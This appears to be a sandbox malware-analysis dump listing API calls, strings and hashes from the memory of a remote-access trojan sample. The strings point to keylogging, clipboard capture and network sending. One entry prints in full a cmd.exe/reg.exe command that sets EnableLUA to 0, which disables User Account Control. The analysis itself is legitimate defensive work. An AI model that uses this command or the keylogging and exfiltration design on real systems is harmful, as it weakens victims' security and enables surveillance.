• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
APIs
• GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
• SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
• _free.LIBCMT ref: 00446F06
• _free.LIBCMT ref: 00446F2E
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
• SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
• _abort.LIBCMT ref: 00446F4D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
                                                                                                                                                                                              • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                              • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                                                                                              • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                              • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Enum$InfoQueryValue
                                                                                                                                                                                              • String ID: [regsplt]$DG
                                                                                                                                                                                              • API String ID: 3554306468-1089238109
                                                                                                                                                                                              • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                              • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID: wKE
                                                                                                                                                                                              • API String ID: 269201875-3150218262
                                                                                                                                                                                              • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                              • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                              • API String ID: 2974294136-4018440003
                                                                                                                                                                                              • Opcode ID: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                              • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                                                                                              • Opcode Fuzzy Hash: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EventLocalTimewsprintf
                                                                                                                                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                              • API String ID: 1497725170-248792730
                                                                                                                                                                                              • Opcode ID: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                              • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                                                                                              • Opcode Fuzzy Hash: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                              • String ID: `AG
                                                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                                                              • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                              • String ID: 0$MsgWindowClass
                                                                                                                                                                                              • API String ID: 2877667751-2410386613
                                                                                                                                                                                              • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                              • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                                                                                              APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
• Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
• Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
• Opcode ID: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
• Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
• Opcode Fuzzy Hash: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
• Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
APIs
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
• Sleep.KERNEL32(00002710), ref: 00419F89
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
• Opcode ID: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
• Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
• Opcode Fuzzy Hash: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
• Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
• Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
• Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
• Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
• Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
• Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
• Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
• String ID:
• API String ID: 3525466593-0
• Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
• Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
• Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
• Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
APIs
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
• __alloca_probe_16.LIBCMT ref: 0044FF68
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
• __freea.LIBCMT ref: 0044FFD4
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E154
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
• _free.LIBCMT ref: 0044E1B0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
APIs
• _free.LIBCMT ref: 0044F7C5
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 0044F7D7
• _free.LIBCMT ref: 0044F7E9
• _free.LIBCMT ref: 0044F7FB
• _free.LIBCMT ref: 0044F80D
APIs
• _free.LIBCMT ref: 00443315
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 00443327
• _free.LIBCMT ref: 0044333A
• _free.LIBCMT ref: 0044334B
• _free.LIBCMT ref: 0044335C
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
  • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
• API String ID: 2334542088-2372832151
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000104), ref: 00442724
• _free.LIBCMT ref: 004427EF
